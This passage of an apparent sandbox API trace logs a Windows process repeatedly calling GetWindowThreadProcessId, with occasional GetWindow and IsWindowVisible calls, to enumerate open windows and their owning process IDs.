(in: hWnd=0x10050, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4c4 [0134.456] GetWindowThreadProcessId (in: hWnd=0x1008c, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4c4 [0134.456] GetWindowThreadProcessId (in: hWnd=0x400ac, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4c4 [0134.456] GetWindowThreadProcessId (in: hWnd=0x300d6, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4c4 [0134.456] GetWindowThreadProcessId (in: hWnd=0x300c0, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4c4 [0134.456] GetWindowThreadProcessId (in: hWnd=0x1013c, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x50c [0134.456] GetWindowThreadProcessId (in: hWnd=0x10134, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x5a4 [0134.456] GetWindowThreadProcessId (in: hWnd=0x100f6, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x45c [0134.456] GetWindowThreadProcessId (in: hWnd=0x5009a, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4c4 [0134.456] GetWindowThreadProcessId (in: hWnd=0x10270, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x1c4 [0134.457] GetWindowThreadProcessId (in: hWnd=0x302ae, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0xf54 [0134.457] GetWindowThreadProcessId (in: hWnd=0x402f4, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0xec8 [0134.457] GetWindowThreadProcessId (in: hWnd=0x402ec, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0xec8 [0134.457] GetWindowThreadProcessId (in: hWnd=0x402f2, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0xec8 [0134.457] GetWindowThreadProcessId (in: hWnd=0x102d8, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0xc08 [0134.457] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0xd54 [0134.457] GetWindowThreadProcessId (in: hWnd=0x1026a, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0xb44 [0134.457] GetWindowThreadProcessId (in: hWnd=0x20278, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x1c4 [0134.457] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x1c4 [0134.457] GetWindowThreadProcessId (in: hWnd=0x600a8, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x1c4 [0134.457] GetWindowThreadProcessId (in: hWnd=0x900a0, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4c4 [0134.458] GetWindowThreadProcessId (in: hWnd=0x10260, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0xa98 [0134.458] GetWindowThreadProcessId (in: hWnd=0x300be, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4c4 [0134.458] GetWindowThreadProcessId (in: hWnd=0x60150, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4c4 [0134.458] GetWindowThreadProcessId (in: hWnd=0x400ea, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4c4 [0134.458] GetWindowThreadProcessId (in: hWnd=0x300c8, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4c4 [0134.458] GetWindowThreadProcessId (in: hWnd=0x300bc, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4c4 [0134.458] GetWindowThreadProcessId (in: hWnd=0x400b2, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4c4 [0134.458] GetWindowThreadProcessId (in: hWnd=0x300cc, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4c4 [0134.458] GetWindowThreadProcessId (in: hWnd=0x1025c, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0xa88 [0134.458] GetWindowThreadProcessId (in: hWnd=0x10258, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0xa78 [0134.458] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0xa68 [0134.459] GetWindowThreadProcessId (in: hWnd=0x10250, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0xa58 [0134.459] GetWindowThreadProcessId (in: hWnd=0x1024c, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0xa48 [0134.459] GetWindowThreadProcessId (in: hWnd=0x10246, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0xa38 [0134.459] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0xa28 [0134.459] GetWindowThreadProcessId (in: hWnd=0x10240, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0xa18 [0134.459] GetWindowThreadProcessId (in: hWnd=0x1023c, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0xa08 [0134.459] GetWindowThreadProcessId (in: hWnd=0x10238, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x9f8 [0134.459] GetWindowThreadProcessId (in: hWnd=0x10234, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x9e8 [0134.459] GetWindowThreadProcessId (in: hWnd=0x10230, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x9d8 [0134.459] GetWindowThreadProcessId (in: hWnd=0x1022c, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x9c8 [0134.460] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x9b8 [0134.460] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x9a8 [0134.460] GetWindowThreadProcessId (in: hWnd=0x10220, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x998 [0134.460] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x988 [0134.460] GetWindowThreadProcessId (in: hWnd=0x10218, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x978 [0134.460] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x968 [0134.460] GetWindowThreadProcessId (in: hWnd=0x10210, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x958 [0134.460] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x948 [0134.460] GetWindowThreadProcessId (in: hWnd=0x10208, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x938 [0134.460] GetWindowThreadProcessId (in: hWnd=0x10204, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x928 [0134.460] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x918 [0134.461] GetWindowThreadProcessId (in: hWnd=0x101fc, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x908 [0134.461] GetWindowThreadProcessId (in: hWnd=0x101f8, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x8f8 [0134.461] GetWindowThreadProcessId (in: hWnd=0x101f4, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x8e8 [0134.461] GetWindowThreadProcessId (in: hWnd=0x101f0, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x8d8 [0134.461] GetWindowThreadProcessId (in: hWnd=0x101ec, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x8c8 [0134.461] GetWindowThreadProcessId (in: hWnd=0x101e8, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x8b8 [0134.461] GetWindowThreadProcessId (in: hWnd=0x101e4, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x8a8 [0134.461] GetWindowThreadProcessId (in: hWnd=0x101e0, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x898 [0134.461] GetWindowThreadProcessId (in: hWnd=0x101dc, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x888 [0134.461] GetWindowThreadProcessId (in: hWnd=0x101d8, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x878 [0134.461] GetWindowThreadProcessId (in: hWnd=0x101d4, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x868 [0134.462] GetWindowThreadProcessId (in: hWnd=0x101d0, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x858 [0134.462] GetWindowThreadProcessId (in: hWnd=0x101cc, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x848 [0134.462] GetWindowThreadProcessId (in: hWnd=0x101c8, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x838 [0134.462] GetWindowThreadProcessId (in: hWnd=0x101c4, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x828 [0134.462] GetWindowThreadProcessId (in: hWnd=0x101c0, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x818 [0134.462] GetWindowThreadProcessId (in: hWnd=0x101bc, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x808 [0134.462] GetWindowThreadProcessId (in: hWnd=0x101b8, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x2a8 [0134.462] GetWindow (hWnd=0x101b8, uCmd=0x4) returned 0x0 [0134.463] IsWindowVisible (hWnd=0x101b8) returned 0 [0134.463] GetWindowThreadProcessId (in: hWnd=0x101b4, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x114 [0134.463] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x284 [0134.463] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x578 [0134.463] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x504 [0134.463] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x188 [0134.463] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x304 [0134.464] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0xc0 [0134.464] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x124 [0134.464] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x6d8 [0134.464] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x318 [0134.464] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x240 [0134.464] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x90 [0134.464] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x564 [0134.464] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4f8 [0134.464] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x54c [0134.464] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x52c [0134.465] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x418 [0134.465] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x440 [0134.465] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x518 [0134.465] GetWindowThreadProcessId (in: hWnd=0x10166, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x6b8 [0134.465] GetWindowThreadProcessId (in: hWnd=0x10162, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x5b0 [0134.465] GetWindowThreadProcessId (in: hWnd=0x1015e, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x140 [0134.465] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x468 [0134.465] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x50c [0134.465] GetWindowThreadProcessId (in: hWnd=0x10144, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x46c [0134.465] GetWindowThreadProcessId (in: hWnd=0x2013a, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x50c [0134.465] GetWindowThreadProcessId (in: hWnd=0x1012e, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x46c [0134.466] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x50c [0134.466] GetWindowThreadProcessId (in: hWnd=0x10118, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x468 [0134.466] GetWindowThreadProcessId (in: hWnd=0x10116, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x468 [0134.466] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x544 [0134.466] GetWindowThreadProcessId (in: hWnd=0x2001c, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x76c [0134.466] GetWindowThreadProcessId (in: hWnd=0x200a2, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x584 [0134.466] GetWindowThreadProcessId (in: hWnd=0x10106, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x570 [0134.466] GetWindowThreadProcessId (in: hWnd=0x10100, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x45c [0134.466] GetWindowThreadProcessId (in: hWnd=0x100fe, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x53c [0134.466] GetWindowThreadProcessId (in: hWnd=0x5008e, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4c4 [0134.466] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x508 [0134.467] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4c4 [0134.467] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4c4 [0134.467] GetWindowThreadProcessId (in: hWnd=0x10068, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4c4 [0134.467] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x7ec [0134.467] GetWindowThreadProcessId (in: hWnd=0x10064, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4c4 [0134.467] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4d8 [0134.467] GetWindowThreadProcessId (in: hWnd=0x1004c, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4c4 [0134.467] GetWindowThreadProcessId (in: hWnd=0x10044, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x45c [0134.467] GetWindowThreadProcessId (in: hWnd=0x20040, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x45c [0134.467] GetWindowThreadProcessId (in: hWnd=0x3003e, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x44c [0134.467] GetWindowThreadProcessId (in: hWnd=0x20022, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x7d4 [0134.468] GetWindowThreadProcessId (in: hWnd=0x302d4, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x45c [0134.468] GetWindowThreadProcessId (in: hWnd=0x100ec, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x45c [0134.468] GetWindowThreadProcessId (in: hWnd=0x10136, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x5a4 [0134.468] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4c4 [0134.468] GetWindowThreadProcessId (in: hWnd=0x1004e, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4c4 [0134.468] GetWindowThreadProcessId (in: hWnd=0x10294, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x1c4 [0134.468] GetWindowThreadProcessId (in: hWnd=0x40156, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x1c4 [0134.468] GetWindowThreadProcessId (in: hWnd=0x4012a, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0xf54 [0134.468] GetWindowThreadProcessId (in: hWnd=0x402f6, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0xec8 [0134.468] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0xc08 [0134.469] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0xd54 [0134.469] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0xa98 [0134.469] GetWindowThreadProcessId (in: hWnd=0x1025e, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0xa88 [0134.469] GetWindowThreadProcessId (in: hWnd=0x1025a, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0xa78 [0134.469] GetWindowThreadProcessId (in: hWnd=0x10256, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0xa68 [0134.469] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0xa58 [0134.469] GetWindowThreadProcessId (in: hWnd=0x1024e, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0xa48 [0134.469] GetWindowThreadProcessId (in: hWnd=0x1024a, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0xa38 [0134.469] GetWindowThreadProcessId (in: hWnd=0x10248, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0xa28 [0134.469] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0xa18 [0134.469] GetWindowThreadProcessId (in: hWnd=0x1023e, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0xa08 [0134.470] GetWindowThreadProcessId (in: hWnd=0x1023a, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x9f8 [0134.470] GetWindowThreadProcessId (in: hWnd=0x10236, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x9e8 [0134.470] GetWindowThreadProcessId (in: hWnd=0x10232, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x9d8 [0134.470] GetWindowThreadProcessId (in: hWnd=0x1022e, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x9c8 [0134.470] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x9b8 [0134.470] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x9a8 [0134.470] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x998 [0134.470] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x988 [0134.470] GetWindowThreadProcessId (in: hWnd=0x1021a, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x978 [0134.471] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x968 [0134.471] GetWindowThreadProcessId (in: hWnd=0x10212, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x958 [0134.471] GetWindowThreadProcessId (in: hWnd=0x1020e, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x948 [0134.471] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x938 [0134.471] GetWindowThreadProcessId (in: hWnd=0x10206, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x928 [0134.471] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x918 [0134.471] GetWindowThreadProcessId (in: hWnd=0x101fe, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x908 [0134.471] GetWindowThreadProcessId (in: hWnd=0x101fa, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x8f8 [0134.471] GetWindowThreadProcessId (in: hWnd=0x101f6, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x8e8 [0134.472] GetWindowThreadProcessId (in: hWnd=0x101f2, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x8d8 [0134.472] GetWindowThreadProcessId (in: hWnd=0x101ee, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x8c8 [0134.472] GetWindowThreadProcessId (in: hWnd=0x101ea, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x8b8 [0134.472] GetWindowThreadProcessId (in: hWnd=0x101e6, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x8a8 [0134.472] GetWindowThreadProcessId (in: hWnd=0x101e2, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x898 [0134.472] GetWindowThreadProcessId (in: hWnd=0x101de, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x888 [0134.472] GetWindowThreadProcessId (in: hWnd=0x101da, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x878 [0134.472] GetWindowThreadProcessId (in: hWnd=0x101d6, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x868 [0134.473] GetWindowThreadProcessId (in: hWnd=0x101d2, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x858 [0134.473] GetWindowThreadProcessId (in: hWnd=0x101ce, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x848 [0134.473] GetWindowThreadProcessId (in: hWnd=0x101ca, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x838 [0134.473] GetWindowThreadProcessId (in: hWnd=0x101c6, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x828 [0134.473] GetWindowThreadProcessId (in: hWnd=0x101c2, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x818 [0134.473] GetWindowThreadProcessId (in: hWnd=0x101be, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x808 [0134.473] GetWindowThreadProcessId (in: hWnd=0x101ba, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x2a8 [0134.473] GetWindow (hWnd=0x101ba, uCmd=0x4) returned 0x101b8 [0134.473] GetWindowThreadProcessId (in: hWnd=0x101b6, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x114 [0134.473] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x284 [0134.474] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x578 [0134.474] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x504 [0134.474] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x188 [0134.474] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x304 [0134.474] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0xc0 [0134.474] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x124 [0134.474] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x6d8 [0134.474] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x318 [0134.475] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x240 [0134.475] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x90 [0134.475] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x564 [0134.475] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4f8 [0134.475] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x54c [0134.475] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x52c [0134.475] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x418 [0134.475] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x440 [0134.475] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x518 [0134.475] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x6b8 [0134.476] GetWindowThreadProcessId (in: hWnd=0x10164, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x5b0 [0134.476] GetWindowThreadProcessId (in: hWnd=0x10160, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x140 [0134.476] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x46c [0134.476] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x18a0ec | 